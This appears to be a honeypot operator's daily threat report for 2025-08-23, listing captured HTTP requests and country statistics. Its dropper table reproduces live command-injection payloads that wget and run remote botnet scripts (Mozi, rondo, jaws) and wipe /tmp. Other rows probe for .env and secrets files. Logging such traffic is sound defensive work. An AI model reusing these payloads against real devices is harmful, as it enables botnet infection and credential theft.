
Report: 2025-08-23

Author
Shoggoth Industries

Daily Report: 2025-08-23

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 45 new requests that have never been observed before (these were added to the monitored request database).

A total of 836 requests were recorded during the day, originating from 5 different countries, with a peak of 418 requests coming from GB.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| GB | Germany |
| US | Dubai |
| GB | Dubai |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 156.192.180.249 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1` |
| 45.156.87.165 | `GET /proxy.cgi?chk&url=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.hsg.sh%7Csh%3B HTTP/1.1` |
| 45.156.87.165 | `GET /goform/SystemCommand?command=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.qyz.sh%7Csh HTTP/1.1` |
| 120.86.255.9 | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0` |
| 122.97.209.152 | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.33.10.58:51278/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0` |

request

The requests listed here are those that have not yet been integrated into the request database.

|  | number_of_occurence | request |
|---|---|---|
| 18 | 3 | `POST /goform/SystemCommand HTTP/1.1` |
| 165 | 2 | `GET /poc/system/serviceInfo.json?v=1 HTTP/1.1` |
| 168 | 2 | `CONNECT 196.251.66.3:80 HTTP/1.0` |
| 174 | 2 | `\x04\x01\x00P\xC4\xFBB\x03\x00` |
| 216 | 1 | `GET /config/.env.staging HTTP/1.1` |
| 217 | 1 | `GET /config/.env.testing HTTP/1.1` |
| 218 | 1 | `GET /config/.env.example HTTP/1.1` |
| 221 | 1 | `GET /config/.env.template HTTP/1.1` |
| 222 | 1 | `GET /config/.env.sample HTTP/1.1` |
| 223 | 1 | `GET /config/.env.tmp HTTP/1.1` |
| 226 | 1 | `GET /src/config/.env HTTP/1.1` |
| 227 | 1 | `GET /src/env/.env HTTP/1.1` |
| 234 | 1 | `GET /temp/env/.env HTTP/1.1` |
| 245 | 1 | `GET /laravel/.env.example HTTP/1.1` |
| 246 | 1 | `GET /laravel/config/.env HTTP/1.1` |
| 247 | 1 | `GET /laravel/storage/.env HTTP/1.1` |
| 249 | 1 | `GET /django/settings/.env HTTP/1.1` |
| 250 | 1 | `GET /django/config/.env HTTP/1.1` |
| 253 | 1 | `GET /rails/config/.env HTTP/1.1` |
| 254 | 1 | `GET /php/.env HTTP/1.1` |
| 255 | 1 | `GET /www/config/.env HTTP/1.1` |
| 259 | 1 | `GET /k8s/secrets.env HTTP/1.1` |
| 265 | 1 | `GET /.env.pipeline HTTP/1.1` |
| 268 | 1 | `GET /github/workflows/.env HTTP/1.1` |
| 269 | 1 | `GET /gitlab-ci/.env HTTP/1.1` |
| 272 | 1 | `GET /etc/environment HTTP/1.1` |
| 273 | 1 | `GET /etc/secrets/.env HTTP/1.1` |
| 274 | 1 | `GET /usr/local/etc/.env HTTP/1.1` |
| 275 | 1 | `GET /usr/local/etc/config/.env HTTP/1.1` |
| 280 | 1 | `GET /config/secrets/.env HTTP/1.1` |
| 289 | 1 | `GET /.env-vars HTTP/1.1` |
| 290 | 1 | `GET /.app-env HTTP/1.1` |
| 293 | 1 | `GET /.dev-env HTTP/1.1` |
| 294 | 1 | `GET /myplms/public HTTP/1.1` |
| 295 | 1 | `GET /api/myplms/public HTTP/1.1` |
| 296 | 1 | `GET /api/myplms/auth/login HTTP/1.1` |
| 297 | 1 | `GET /api/myplms/users HTTP/1.1` |
| 298 | 1 | `GET /api/myplms/courses HTTP/1.1` |
| 299 | 1 | `GET /api/myplms/settings/info.php HTTP/1.1` |
| 300 | 1 | `GET /phpunit.xml HTTP/1.1` |
| 301 | 1 | `GET /supervisor-example.conf HTTP/1.1` |
| 312 | 1 | `GET /.env.lock HTTP/1.1` |
| 374 | 1 | `GET /.blog HTTP/1.1` |
| 381 | 1 | `GET http://www.serv00.com HTTP/1.1` |
| 382 | 1 | `HEAD http://www.serv00.com HTTP/1.1` |

country_iso_code

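|  | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 418 | GB |
| 1 | 158 | NL |
| 2 | 79 | BG |
| 3 | 62 | US |
| 4 | 31 | ZA |
| 5 | 14 | SC |
| 6 | 14 | DE |
| 7 | 9 | KR |
| 8 | 6 | UA |
| 9 | 6 | RU |
| 10 | 6 | JP |
| 11 | 6 | SG |
| 12 | 6 | TR |
| 13 | 5 | LT |
| 14 | 4 | IR |
| 15 | 2 | CN |
| 16 | 2 | PT |
| 17 | 2 | HK |
| 18 | 1 | ES |
| 19 | 1 | BR |
| 20 | 1 | EG |
| 21 | 1 | BE |
| 22 | 1 | FR |
| 23 | 1 | SE |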
